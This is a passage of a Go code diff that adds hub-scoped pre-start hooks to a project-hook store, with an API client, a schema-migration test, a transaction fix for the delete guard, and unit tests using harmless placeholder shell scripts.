+	resp, err := s.c.get(ctx, s.basePath()+"/"+url.PathEscape(hookID), nil)
+	if err != nil {
+		return nil, err
+	}
+	return apiclient.DecodeResponse[store.ProjectPreStartHook](resp)
+}
+
+func (s *hubPreStartHookService) Create(ctx context.Context, req *CreateProjectPreStartHookRequest) (*store.ProjectPreStartHook, error) {
+	resp, err := s.c.post(ctx, s.basePath(), req, nil)
+	if err != nil {
+		return nil, err
+	}
+	return apiclient.DecodeResponse[store.ProjectPreStartHook](resp)
+}
+
+func (s *hubPreStartHookService) Update(ctx context.Context, hookID string, req *UpdateProjectPreStartHookRequest) (*store.ProjectPreStartHook, error) {
+	resp, err := s.c.put(ctx, s.basePath()+"/"+url.PathEscape(hookID), req, nil)
+	if err != nil {
+		return nil, err
+	}
+	return apiclient.DecodeResponse[store.ProjectPreStartHook](resp)
+}
+
+func (s *hubPreStartHookService) Activate(ctx context.Context, hookID string) (*store.ProjectPreStartHook, error) {
+	resp, err := s.c.post(ctx, s.basePath()+"/"+url.PathEscape(hookID)+"/activate", nil, nil)
+	if err != nil {
+		return nil, err
+	}
+	return apiclient.DecodeResponse[store.ProjectPreStartHook](resp)
+}
+
+func (s *hubPreStartHookService) Delete(ctx context.Context, hookID string) error {
+	resp, err := s.c.delete(ctx, s.basePath()+"/"+url.PathEscape(hookID), nil)
+	if err != nil {
+		return err
+	}
+	return apiclient.CheckResponse(resp)
+}

--- a/pkg/store/entadapter/project_pre_start_hook_migration_test.go
+++ b/pkg/store/entadapter/project_pre_start_hook_migration_test.go
@@ -1,0 +1,119 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+//go:build !no_sqlite
+
+package entadapter
+
+import (
+	"context"
+	"database/sql"
+	"path/filepath"
+	"testing"
+
+	"github.com/GoogleCloudPlatform/scion/pkg/ent/entc"
+	"github.com/GoogleCloudPlatform/scion/pkg/store"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+// =============================================================================
+// Upgrade path — AutoMigrate over a pre-scope (v1) table
+// =============================================================================
+
+// TestPreStartHook_UpgradeFromPreScopeSchema exercises the schema migration on
+// a database that predates the `scope` column. The v1 DDL is inlined here on
+// purpose: it is a frozen snapshot of what already-deployed hubs have on disk,
+// so it must not be regenerated from the current schema.
+//
+// Three things are load-bearing and asserted below:
+//  1. Adding the `scope` enum backfills existing rows with "project".
+//  2. `project_id` widening from NOT NULL to nullable succeeds on SQLite
+//     (Atlas rebuilds the table) without losing rows.
+//  3. The unique index swap (project_id, slug) -> (scope, project_id, slug)
+//     still enforces hub-scope slug uniqueness, which only holds because
+//     hub rows store project_id as "" rather than NULL.
+func TestPreStartHook_UpgradeFromPreScopeSchema(t *testing.T) {
+	dsn := "file:" + filepath.Join(t.TempDir(), "test.db")
+	ctx := context.Background()
+
+	raw, err := sql.Open("sqlite", dsn)
+	require.NoError(t, err)
+
+	// Old v1 DDL.
+	old := []string{
+		`CREATE TABLE ` + "`project_pre_start_hooks`" + ` (
+			` + "`id`" + ` uuid NOT NULL,
+			` + "`project_id`" + ` text NOT NULL,
+			` + "`name`" + ` text NOT NULL,
+			` + "`slug`" + ` text NOT NULL,
+			` + "`description`" + ` text NULL,
+			` + "`script`" + ` text NOT NULL,
+			` + "`status`" + ` text NOT NULL DEFAULT ('active'),
+			` + "`created_by`" + ` text NULL,
+			` + "`updated_by`" + ` text NULL,
+			` + "`created`" + ` datetime NOT NULL,
+			` + "`updated`" + ` datetime NOT NULL,
+			PRIMARY KEY (` + "`id`" + `)
+		)`,
+		"CREATE UNIQUE INDEX `projectprestarthook_project_id_slug` ON `project_pre_start_hooks` (`project_id`, `slug`)",
+		"CREATE INDEX `projectprestarthook_project_id_status` ON `project_pre_start_hooks` (`project_id`, `status`)",
+		`INSERT INTO project_pre_start_hooks
+		   (id, project_id, name, slug, script, status, created, updated)
+		 VALUES ('11111111-1111-1111-1111-111111111111','proj-1','Legacy','legacy',
+		         '#!/bin/sh
+echo legacy
+','active','2026-01-01 00:00:00+00:00','2026-01-01 00:00:00+00:00')`,
+	}
+	for _, stmt := range old {
+		_, err := raw.ExecContext(ctx, stmt)
+		require.NoError(t, err, stmt)
+	}
+	require.NoError(t, raw.Close())
+
+	client, err := entc.OpenSQLite(dsn, entc.PoolConfig{MaxOpenConns: 1})
+	require.NoError(t, err)
+
+	// Now upgrade.
+	require.NoError(t, entc.AutoMigrate(ctx, client))
+
+	s := NewProjectPreStartHookStore(client)
+
+	// Legacy row survived and defaulted to scope="project".
+	legacy, err := s.GetActiveProjectPreStartHook(ctx, "proj-1")
+	require.NoError(t, err)
+	assert.Equal(t, "11111111-1111-1111-1111-111111111111", legacy.ID)
+	assert.Equal(t, store.PreStartHookScopeProject, legacy.Scope)
+	assert.Equal(t, "Legacy", legacy.Name)
+
+	// Hub hooks work on the upgraded DB.
+	hub, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name: "Hub", Slug: "hub", Script: "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, store.PreStartHookScopeHub, hub.Scope)
+
+	// Hub slug uniqueness is enforced (proves project_id is '' not NULL).
+	_, err = s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name: "Hub dup", Slug: "hub", Script: "#!/bin/sh\n",
+	})
+	assert.ErrorIs(t, err, store.ErrAlreadyExists)
+
+	// Legacy project hook still active — hub create did not disturb it.
+	legacy2, err := s.GetActiveProjectPreStartHook(ctx, "proj-1")
+	require.NoError(t, err)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, legacy2.Status)
+
+	require.NoError(t, client.Close())
+}

--- a/pkg/store/entadapter/project_pre_start_hook_store.go
+++ b/pkg/store/entadapter/project_pre_start_hook_store.go
@@ -20,11 +20,16 @@ import (
 	"time"
 
 	"github.com/GoogleCloudPlatform/scion/pkg/ent"
+	"github.com/GoogleCloudPlatform/scion/pkg/ent/predicate"
 	entpsh "github.com/GoogleCloudPlatform/scion/pkg/ent/projectprestarthook"
 	"github.com/GoogleCloudPlatform/scion/pkg/store"
 )
 
 // ProjectPreStartHookStore implements store.ProjectPreStartHookStore using Ent ORM.
+//
+// Both project-scoped and hub-scoped hooks live in the same table, told apart
+// by the `scope` column. Every query below is scope-qualified so the two
+// flavours can never leak into each other's result sets.
 type ProjectPreStartHookStore struct {
 	client *ent.Client
 }
@@ -38,6 +43,7 @@ func NewProjectPreStartHookStore(client *ent.Client) *ProjectPreStartHookStore {
 func entPSHToStore(e *ent.ProjectPreStartHook) *store.ProjectPreStartHook {
 	return &store.ProjectPreStartHook{
 		ID:          e.ID.String(),
+		Scope:       string(e.Scope),
 		ProjectID:   e.ProjectID,
 		Name:        e.Name,
 		Slug:        e.Slug,
@@ -51,53 +57,55 @@ func entPSHToStore(e *ent.ProjectPreStartHook) *store.ProjectPreStartHook {
 	}
 }
 
-// GetActiveProjectPreStartHook returns the single active hook for a project.
-func (s *ProjectPreStartHookStore) GetActiveProjectPreStartHook(ctx context.Context, projectID string) (*store.ProjectPreStartHook, error) {
-	e, err := s.client.ProjectPreStartHook.Query().
-		Where(
-			entpsh.ProjectID(projectID),
-			entpsh.StatusEQ(entpsh.StatusActive),
-		).
-		Only(ctx)
+// pshScopePreds builds the predicates that confine a query to a single scope.
+// For project scope the project_id is included; hub-scoped rows carry an empty
+// project_id and are identified by the scope column alone.
+func pshScopePreds(scope entpsh.Scope, projectID string) []predicate.ProjectPreStartHook {
+	preds := []predicate.ProjectPreStartHook{entpsh.ScopeEQ(scope)}
+	if scope == entpsh.ScopeProject {
+		preds = append(preds, entpsh.ProjectID(projectID))
+	}
+	return preds
+}
+
+// getActiveHook returns the single active hook within a scope.
+func (s *ProjectPreStartHookStore) getActiveHook(ctx context.Context, scope entpsh.Scope, projectID string) (*store.ProjectPreStartHook, error) {
+	preds := append(pshScopePreds(scope, projectID), entpsh.StatusEQ(entpsh.StatusActive))
+	e, err := s.client.ProjectPreStartHook.Query().Where(preds...).Only(ctx)
 	if err != nil {
 		if ent.IsNotFound(err) {
 			return nil, store.ErrNotFound
 		}
-		return nil, fmt.Errorf("get active project pre-start hook: %w", err)
+		return nil, fmt.Errorf("get active %s pre-start hook: %w", scope, err)
 	}
 	return entPSHToStore(e), nil
 }
 
-// GetProjectPreStartHook returns a specific hook by ID within a project.
-func (s *ProjectPreStartHookStore) GetProjectPreStartHook(ctx context.Context, hookID, projectID string) (*store.ProjectPreStartHook, error) {
+// getHook returns a specific hook by ID within a scope.
+func (s *ProjectPreStartHookStore) getHook(ctx context.Context, scope entpsh.Scope, hookID, projectID string) (*store.ProjectPreStartHook, error) {
 	uid, err := parseUUID(hookID)
 	if err != nil {
 		return nil, store.ErrNotFound
 	}
-	e, err := s.client.ProjectPreStartHook.Query().
-		Where(
-			entpsh.ID(uid),
-			entpsh.ProjectID(projectID),
-		).
-		Only(ctx)
+	preds := append(pshScopePreds(scope, projectID), entpsh.ID(uid))
+	e, err := s.client.ProjectPreStartHook.Query().Where(preds...).Only(ctx)
 	if err != nil {
 		if ent.IsNotFound(err) {
 			return nil, store.ErrNotFound
 		}
-		return nil, fmt.Errorf("get project pre-start hook: %w", err)
+		return nil, fmt.Errorf("get %s pre-start hook: %w", scope, err)
 	}
 	return entPSHToStore(e), nil
 }
 
-// ListProjectPreStartHooks returns all hooks for a project (all statuses),
-// ordered by creation time descending.
-func (s *ProjectPreStartHookStore) ListProjectPreStartHooks(ctx context.Context, projectID string) ([]*store.ProjectPreStartHook, error) {
+// listHooks returns all hooks within a scope, newest first.
+func (s *ProjectPreStartHookStore) listHooks(ctx context.Context, scope entpsh.Scope, projectID string) ([]*store.ProjectPreStartHook, error) {
 	rows, err := s.client.ProjectPreStartHook.Query().
-		Where(entpsh.ProjectID(projectID)).
+		Where(pshScopePreds(scope, projectID)...).
 		Order(ent.Desc(entpsh.FieldCreated)).
 		All(ctx)
 	if err != nil {
-		return nil, fmt.Errorf("list project pre-start hooks: %w", err)
+		return nil, fmt.Errorf("list %s pre-start hooks: %w", scope, err)
 	}
 	out := make([]*store.ProjectPreStartHook, len(rows))
 	for i, e := range rows {
@@ -106,15 +114,25 @@ func (s *ProjectPreStartHookStore) ListProjectPreStartHooks(ctx context.Context,
 	return out, nil
 }
 
-// CreateProjectPreStartHook creates a new hook and atomically archives any
-// existing active hook for the same project. The new hook is always created
-// with status "active"; passing any other status is rejected to prevent
-// callers from inserting an archived hook without going through the
-// archive-on-create semantics.
-func (s *ProjectPreStartHookStore) CreateProjectPreStartHook(ctx context.Context, hook *store.ProjectPreStartHook) (*store.ProjectPreStartHook, error) {
+// createHook creates a new hook within a scope and atomically archives the
+// scope's existing active hook. The new hook is always created with status
+// "active"; passing any other status is rejected to prevent callers from
+// inserting an archived hook without going through the archive-on-create
+// semantics.
+func (s *ProjectPreStartHookStore) createHook(ctx context.Context, scope entpsh.Scope, hook *store.ProjectPreStartHook) (*store.ProjectPreStartHook, error) {
+	projectID := ""
+	if scope == entpsh.ScopeProject {
+		if hook.ProjectID == "" {
+			return nil, fmt.Errorf("%w: project-scoped pre-start hook requires a project ID", store.ErrInvalidInput)
+		}
+		projectID = hook.ProjectID
+	}
+
 	now := time.Now()
 	hook.Created = now
 	hook.Updated = now
+	hook.Scope = string(scope)
+	hook.ProjectID = projectID
 	// Normalise: treat empty status as active; reject any other value.
 	if hook.Status == "" {
 		hook.Status = store.ProjectPreStartHookStatusActive
@@ -129,23 +147,20 @@ func (s *ProjectPreStartHookStore) CreateProjectPreStartHook(ctx context.Context
 		return nil, fmt.Errorf("begin transaction: %w", err)
 	}
 
-	// If the new hook is active, archive any existing active hook first.
-	if hook.Status == store.ProjectPreStartHookStatusActive {
-		if err := tx.ProjectPreStartHook.Update().
-			Where(
-				entpsh.ProjectID(hook.ProjectID),
-				entpsh.StatusEQ(entpsh.StatusActive),
-			).
-			SetStatus(entpsh.StatusArchived).
-			SetUpdated(now).
-			Exec(ctx); err != nil {
-			_ = tx.Rollback()
-			return nil, fmt.Errorf("archive existing active hooks: %w", err)
-		}
+	// Archive any existing active hook in the same scope.
+	archivePreds := append(pshScopePreds(scope, projectID), entpsh.StatusEQ(entpsh.StatusActive))
+	if err := tx.ProjectPreStartHook.Update().
+		Where(archivePreds...).
+		SetStatus(entpsh.StatusArchived).
+		SetUpdated(now).
+		Exec(ctx); err != nil {
+		_ = tx.Rollback()
+		return nil, fmt.Errorf("archive existing active hooks: %w", err)
 	}
 
 	create := tx.ProjectPreStartHook.Create().
-		SetProjectID(hook.ProjectID).
+		SetScope(scope).
+		SetProjectID(projectID).
 		SetName(hook.Name).
 		SetSlug(hook.Slug).
 		SetScript(hook.Script).
@@ -174,9 +189,9 @@ func (s *ProjectPreStartHookStore) CreateProjectPreStartHook(ctx context.Context
 	if err != nil {
 		_ = tx.Rollback()
 		if ent.IsConstraintError(err) {
-			return nil, fmt.Errorf("%w: slug %q already exists in project", store.ErrAlreadyExists, hook.Slug)
+			return nil, fmt.Errorf("%w: slug %q already exists in %s scope", store.ErrAlreadyExists, hook.Slug, scope)
 		}
-		return nil, fmt.Errorf("create project pre-start hook: %w", err)
+		return nil, fmt.Errorf("create %s pre-start hook: %w", scope, err)
 	}
 
 	if err := tx.Commit(); err != nil {
@@ -186,18 +201,19 @@ func (s *ProjectPreStartHookStore) CreateProjectPreStartHook(ctx context.Context
 	return entPSHToStore(e), nil
 }
 
-// UpdateProjectPreStartHook updates the mutable fields of a hook.
-func (s *ProjectPreStartHookStore) UpdateProjectPreStartHook(ctx context.Context, hook *store.ProjectPreStartHook) (*store.ProjectPreStartHook, error) {
+// updateHook updates the mutable fields of a hook within a scope.
+func (s *ProjectPreStartHookStore) updateHook(ctx context.Context, scope entpsh.Scope, hook *store.ProjectPreStartHook) (*store.ProjectPreStartHook, error) {
 	uid, err := parseUUID(hook.ID)
 	if err != nil {
 		return nil, store.ErrNotFound
 	}
 
 	now := time.Now()
-	// Add a project-ID predicate so a caller cannot accidentally update a hook
-	// that belongs to a different project even if they somehow have the UUID.
+	// The scope (and, for project scope, the project-ID) predicates ensure a
+	// caller cannot update a hook outside the scope they addressed, even if
+	// they somehow have the UUID.
 	upd := s.client.ProjectPreStartHook.UpdateOneID(uid).
-		Where(entpsh.ProjectID(hook.ProjectID)).
+		Where(pshScopePreds(scope, hook.ProjectID)...).
 		SetUpdated(now)
 	if hook.Name != "" {
 		upd = upd.SetName(hook.Name)
@@ -216,14 +232,14 @@ func (s *ProjectPreStartHookStore) UpdateProjectPreStartHook(ctx context.Context
 		if ent.IsNotFound(err) {
 			return nil, store.ErrNotFound
 		}
-		return nil, fmt.Errorf("update project pre-start hook: %w", err)
+		return nil, fmt.Errorf("update %s pre-start hook: %w", scope, err)
 	}
 	return entPSHToStore(e), nil
 }
 
-// ActivateProjectPreStartHook sets the identified hook to "active" and archives
-// all other hooks for the same project atomically.
-func (s *ProjectPreStartHookStore) ActivateProjectPreStartHook(ctx context.Context, hookID, projectID string) (*store.ProjectPreStartHook, error) {
+// activateHook sets the identified hook to "active" and archives all other
+// hooks in the same scope atomically.
+func (s *ProjectPreStartHookStore) activateHook(ctx context.Context, scope entpsh.Scope, hookID, projectID string) (*store.ProjectPreStartHook, error) {
 	uid, err := parseUUID(hookID)
 	if err != nil {
 		return nil, store.ErrNotFound
@@ -236,12 +252,10 @@ func (s *ProjectPreStartHookStore) ActivateProjectPreStartHook(ctx context.Conte
 
 	now := time.Now()
 
-	// Archive all currently-active hooks for this project.
+	// Archive all currently-active hooks in this scope.
+	archivePreds := append(pshScopePreds(scope, projectID), entpsh.StatusEQ(entpsh.StatusActive))
 	if err := tx.ProjectPreStartHook.Update().
-		Where(
-			entpsh.ProjectID(projectID),
-			entpsh.StatusEQ(entpsh.StatusActive),
-		).
+		Where(archivePreds...).
 		SetStatus(entpsh.StatusArchived).
 		SetUpdated(now).
 		Exec(ctx); err != nil {
@@ -251,7 +265,7 @@ func (s *ProjectPreStartHookStore) ActivateProjectPreStartHook(ctx context.Conte
 
 	// Activate the target hook.
 	e, err := tx.ProjectPreStartHook.UpdateOneID(uid).
-		Where(entpsh.ProjectID(projectID)).
+		Where(pshScopePreds(scope, projectID)...).
 		SetStatus(entpsh.StatusActive).
 		SetUpdated(now).
 		Save(ctx)
@@ -260,7 +274,7 @@ func (s *ProjectPreStartHookStore) ActivateProjectPreStartHook(ctx context.Conte
 		if ent.IsNotFound(err) {
 			return nil, store.ErrNotFound
 		}
-		return nil, fmt.Errorf("activate project pre-start hook: %w", err)
+		return nil, fmt.Errorf("activate %s pre-start hook: %w", scope, err)
 	}
 
 	if err := tx.Commit(); err != nil {
@@ -270,36 +284,32 @@ func (s *ProjectPreStartHookStore) ActivateProjectPreStartHook(ctx context.Conte
 	return entPSHToStore(e), nil
 }
 
-// DeleteProjectPreStartHook hard-deletes a hook. Returns store.ErrInvalidInput
-// if the hook is currently active AND is not the only hook in the project.
-// Deleting the last remaining active hook (with no archived hooks to fall
-// back to) is allowed so that operators can fully remove all pre-start hooks.
-func (s *ProjectPreStartHookStore) DeleteProjectPreStartHook(ctx context.Context, hookID, projectID string) error {
+// deleteHook hard-deletes a hook within a scope. Returns store.ErrInvalidInput
+// if the hook is currently active AND is not the only hook in the scope.
+// Deleting the last remaining active hook (with no archived hooks to fall back
+// to) is allowed so that operators can fully remove all pre-start hooks.
+func (s *ProjectPreStartHookStore) deleteHook(ctx context.Context, scope entpsh.Scope, hookID, projectID string) error {
 	uid, err := parseUUID(hookID)
 	if err != nil {
 		return store.ErrNotFound
 	}
 
-	// Verify the hook exists in this project and check its status.
-	e, err := s.client.ProjectPreStartHook.Query().
-		Where(
-			entpsh.ID(uid),
-			entpsh.ProjectID(projectID),
-		).
-		Only(ctx)
+	// Verify the hook exists in this scope and check its status.
+	preds := append(pshScopePreds(scope, projectID), entpsh.ID(uid))
+	e, err := s.client.ProjectPreStartHook.Query().Where(preds...).Only(ctx)
 	if err != nil {
 		if ent.IsNotFound(err) {
 			return store.ErrNotFound
 		}
-		return fmt.Errorf("get project pre-start hook for delete: %w", err)
+		return fmt.Errorf("get %s pre-start hook for delete: %w", scope, err)
 	}
 
 	// If the hook is active, only reject the delete when there are other hooks
-	// still in the project. If this is the last/only hook, a hard delete is
+	// still in the scope. If this is the last/only hook, a hard delete is
 	// allowed so operators can fully clear all pre-start hooks.
 	if e.Status == entpsh.StatusActive {
 		total, err := s.client.ProjectPreStartHook.Query().
-			Where(entpsh.ProjectID(projectID)).
+			Where(pshScopePreds(scope, projectID)...).
 			Count(ctx)
 		if err != nil {
 			return fmt.Errorf("count hooks for delete guard: %w", err)
@@ -314,7 +324,94 @@ func (s *ProjectPreStartHookStore) DeleteProjectPreStartHook(ctx context.Context
 		if ent.IsNotFound(err) {
 			return store.ErrNotFound
 		}
-		return fmt.Errorf("delete project pre-start hook: %w", err)
+		return fmt.Errorf("delete %s pre-start hook: %w", scope, err)
 	}
 	return nil
+}
+
+// =============================================================================
+// Project-scoped API
+// =============================================================================
+
+// GetActiveProjectPreStartHook returns the single active hook for a project.
+func (s *ProjectPreStartHookStore) GetActiveProjectPreStartHook(ctx context.Context, projectID string) (*store.ProjectPreStartHook, error) {
+	return s.getActiveHook(ctx, entpsh.ScopeProject, projectID)
+}
+
+// GetProjectPreStartHook returns a specific hook by ID within a project.
+func (s *ProjectPreStartHookStore) GetProjectPreStartHook(ctx context.Context, hookID, projectID string) (*store.ProjectPreStartHook, error) {
+	return s.getHook(ctx, entpsh.ScopeProject, hookID, projectID)
+}
+
+// ListProjectPreStartHooks returns all hooks for a project (all statuses),
+// ordered by creation time descending.
+func (s *ProjectPreStartHookStore) ListProjectPreStartHooks(ctx context.Context, projectID string) ([]*store.ProjectPreStartHook, error) {
+	return s.listHooks(ctx, entpsh.ScopeProject, projectID)
+}
+
+// CreateProjectPreStartHook creates a new hook and atomically archives any
+// existing active hook for the same project.
+func (s *ProjectPreStartHookStore) CreateProjectPreStartHook(ctx context.Context, hook *store.ProjectPreStartHook) (*store.ProjectPreStartHook, error) {
+	return s.createHook(ctx, entpsh.ScopeProject, hook)
+}
+
+// UpdateProjectPreStartHook updates the mutable fields of a hook.
+func (s *ProjectPreStartHookStore) UpdateProjectPreStartHook(ctx context.Context, hook *store.ProjectPreStartHook) (*store.ProjectPreStartHook, error) {
+	return s.updateHook(ctx, entpsh.ScopeProject, hook)
+}
+
+// ActivateProjectPreStartHook sets the identified hook to "active" and archives
+// all other hooks for the same project atomically.
+func (s *ProjectPreStartHookStore) ActivateProjectPreStartHook(ctx context.Context, hookID, projectID string) (*store.ProjectPreStartHook, error) {
+	return s.activateHook(ctx, entpsh.ScopeProject, hookID, projectID)
+}
+
+// DeleteProjectPreStartHook hard-deletes a hook. Returns store.ErrInvalidInput
+// if the hook is currently active AND is not the only hook in the project.
+func (s *ProjectPreStartHookStore) DeleteProjectPreStartHook(ctx context.Context, hookID, projectID string) error {
+	return s.deleteHook(ctx, entpsh.ScopeProject, hookID, projectID)
+}
+
+// =============================================================================
+// Hub-scoped API
+// =============================================================================
+
+// GetActiveHubPreStartHook returns the single active hub-scoped hook.
+func (s *ProjectPreStartHookStore) GetActiveHubPreStartHook(ctx context.Context) (*store.ProjectPreStartHook, error) {
+	return s.getActiveHook(ctx, entpsh.ScopeHub, "")
+}
+
+// GetHubPreStartHook returns a specific hub-scoped hook by ID.
+func (s *ProjectPreStartHookStore) GetHubPreStartHook(ctx context.Context, hookID string) (*store.ProjectPreStartHook, error) {
+	return s.getHook(ctx, entpsh.ScopeHub, hookID, "")
+}
+
+// ListHubPreStartHooks returns all hub-scoped hooks (all statuses), ordered by
+// creation time descending.
+func (s *ProjectPreStartHookStore) ListHubPreStartHooks(ctx context.Context) ([]*store.ProjectPreStartHook, error) {
+	return s.listHooks(ctx, entpsh.ScopeHub, "")
+}
+
+// CreateHubPreStartHook creates a new hub-scoped hook and atomically archives
+// any existing active hub-scoped hook.
+func (s *ProjectPreStartHookStore) CreateHubPreStartHook(ctx context.Context, hook *store.ProjectPreStartHook) (*store.ProjectPreStartHook, error) {
+	return s.createHook(ctx, entpsh.ScopeHub, hook)
+}
+
+// UpdateHubPreStartHook updates the mutable fields of a hub-scoped hook.
+func (s *ProjectPreStartHookStore) UpdateHubPreStartHook(ctx context.Context, hook *store.ProjectPreStartHook) (*store.ProjectPreStartHook, error) {
+	return s.updateHook(ctx, entpsh.ScopeHub, hook)
+}
+
+// ActivateHubPreStartHook sets the identified hub-scoped hook to "active" and
+// archives all other hub-scoped hooks atomically.
+func (s *ProjectPreStartHookStore) ActivateHubPreStartHook(ctx context.Context, hookID string) (*store.ProjectPreStartHook, error) {
+	return s.activateHook(ctx, entpsh.ScopeHub, hookID, "")
+}
+
+// DeleteHubPreStartHook hard-deletes a hub-scoped hook. Returns
+// store.ErrInvalidInput if the hook is currently active AND other hub-scoped
+// hooks exist.
+func (s *ProjectPreStartHookStore) DeleteHubPreStartHook(ctx context.Context, hookID string) error {
+	return s.deleteHook(ctx, entpsh.ScopeHub, hookID, "")
 }

--- a/pkg/store/entadapter/project_pre_start_hook_store.go
+++ b/pkg/store/entadapter/project_pre_start_hook_store.go
@@ -288,16 +288,27 @@ func (s *ProjectPreStartHookStore) activateHook(ctx context.Context, scope entps
 // if the hook is currently active AND is not the only hook in the scope.
 // Deleting the last remaining active hook (with no archived hooks to fall back
 // to) is allowed so that operators can fully remove all pre-start hooks.
+//
+// The read, the guard count, and the delete all run inside one transaction:
+// evaluated separately, two concurrent deletes of the last two hooks in a scope
+// could each observe total > 1, each be rejected, or — with different
+// interleavings — both proceed and leave the scope empty unintentionally.
 func (s *ProjectPreStartHookStore) deleteHook(ctx context.Context, scope entpsh.Scope, hookID, projectID string) error {
 	uid, err := parseUUID(hookID)
 	if err != nil {
 		return store.ErrNotFound
 	}
 
+	tx, err := s.client.Tx(ctx)
+	if err != nil {
+		return fmt.Errorf("begin transaction: %w", err)
+	}
+
 	// Verify the hook exists in this scope and check its status.
 	preds := append(pshScopePreds(scope, projectID), entpsh.ID(uid))
-	e, err := s.client.ProjectPreStartHook.Query().Where(preds...).Only(ctx)
+	e, err := tx.ProjectPreStartHook.Query().Where(preds...).Only(ctx)
 	if err != nil {
+		_ = tx.Rollback()
 		if ent.IsNotFound(err) {
 			return store.ErrNotFound
 		}
@@ -308,23 +319,30 @@ func (s *ProjectPreStartHookStore) deleteHook(ctx context.Context, scope entpsh.
 	// still in the scope. If this is the last/only hook, a hard delete is
 	// allowed so operators can fully clear all pre-start hooks.
 	if e.Status == entpsh.StatusActive {
-		total, err := s.client.ProjectPreStartHook.Query().
+		total, err := tx.ProjectPreStartHook.Query().
 			Where(pshScopePreds(scope, projectID)...).
 			Count(ctx)
 		if err != nil {
+			_ = tx.Rollback()
 			return fmt.Errorf("count hooks for delete guard: %w", err)
 		}
 		if total > 1 {
+			_ = tx.Rollback()
 			return fmt.Errorf("%w: cannot delete an active hook while other hooks exist; activate another hook first", store.ErrInvalidInput)
 		}
 		// total == 1: this is the only hook — fall through to delete.
 	}
 
-	if err := s.client.ProjectPreStartHook.DeleteOneID(uid).Exec(ctx); err != nil {
+	if err := tx.ProjectPreStartHook.DeleteOneID(uid).Exec(ctx); err != nil {
+		_ = tx.Rollback()
 		if ent.IsNotFound(err) {
 			return store.ErrNotFound
 		}
 		return fmt.Errorf("delete %s pre-start hook: %w", scope, err)
+	}
+
+	if err := tx.Commit(); err != nil {
+		return fmt.Errorf("commit: %w", err)
 	}
 	return nil
 }

--- a/pkg/store/entadapter/project_pre_start_hook_store_test.go
+++ b/pkg/store/entadapter/project_pre_start_hook_store_test.go
@@ -378,3 +378,517 @@ func TestDeleteProjectPreStartHook_WrongProject(t *testing.T) {
 	err = s.DeleteProjectPreStartHook(ctx, first.ID, "proj-2")
 	assert.ErrorIs(t, err, store.ErrNotFound)
 }
+
+// =============================================================================
+// Hub scope — GetActive not found
+// =============================================================================
+
+func TestGetActiveHubPreStartHook_NotFound(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	_, err := s.GetActiveHubPreStartHook(ctx)
+	assert.ErrorIs(t, err, store.ErrNotFound)
+}
+
+// =============================================================================
+// Hub scope — Create + GetActive + Get
+// =============================================================================
+
+func TestCreateHubPreStartHook_Basic(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	hook, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:        "Baseline setup",
+		Slug:        "baseline-setup",
+		Description: "hub-wide default",
+		Script:      "#!/bin/sh\necho baseline\n",
+		CreatedBy:   "admin@example.com",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, store.PreStartHookScopeHub, hook.Scope)
+	assert.Empty(t, hook.ProjectID, "hub hooks must not carry a project ID")
+	assert.Equal(t, "baseline-setup", hook.Slug)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, hook.Status)
+	assert.NotEmpty(t, hook.ID)
+
+	active, err := s.GetActiveHubPreStartHook(ctx)
+	require.NoError(t, err)
+	assert.Equal(t, hook.ID, active.ID)
+	assert.Equal(t, store.PreStartHookScopeHub, active.Scope)
+
+	byID, err := s.GetHubPreStartHook(ctx, hook.ID)
+	require.NoError(t, err)
+	assert.Equal(t, hook.ID, byID.ID)
+	assert.Equal(t, "hub-wide default", byID.Description)
+}
+
+// CreateHubPreStartHook must ignore any project ID supplied by the caller so a
+// hub hook can never be silently bound to a project.
+func TestCreateHubPreStartHook_IgnoresProjectID(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	hook, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		ProjectID: "proj-1",
+		Name:      "Hub hook",
+		Slug:      "hub-hook",
+		Script:    "#!/bin/sh\n",
+	})
+	require.NoError(t, err)
+	assert.Empty(t, hook.ProjectID)
+	assert.Equal(t, store.PreStartHookScopeHub, hook.Scope)
+
+	// It must not be visible from the project-scoped API.
+	_, err = s.GetProjectPreStartHook(ctx, hook.ID, "proj-1")
+	assert.ErrorIs(t, err, store.ErrNotFound)
+}
+
+// A project-scoped create with no project ID is rejected — the schema no
+// longer enforces NotEmpty on project_id (hub hooks need it empty), so the
+// store layer preserves the invariant.
+func TestCreateProjectPreStartHook_RequiresProjectID(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	_, err := s.CreateProjectPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "No project",
+		Slug:   "no-project",
+		Script: "#!/bin/sh\n",
+	})
+	assert.ErrorIs(t, err, store.ErrInvalidInput)
+}
+
+// =============================================================================
+// Hub scope — create archives the previous active hub hook
+// =============================================================================
+
+func TestCreateHubPreStartHook_ArchivesPrevious(t *testing.T) {
+	s := newTestPSHStore(t)
+	ctx := context.Background()
+
+	first, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "First",
+		Slug:   "first",
+		Script: "#!/bin/sh\necho first\n",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, store.ProjectPreStartHookStatusActive, first.Status)
+
+	second, err := s.CreateHubPreStartHook(ctx, &store.ProjectPreStartHook{
+		Name:   "Second",
+		Slug:   "second",
+		Script: "#!/bin/sh\necho second\n",
+	})
+	require.NoError(t, err)
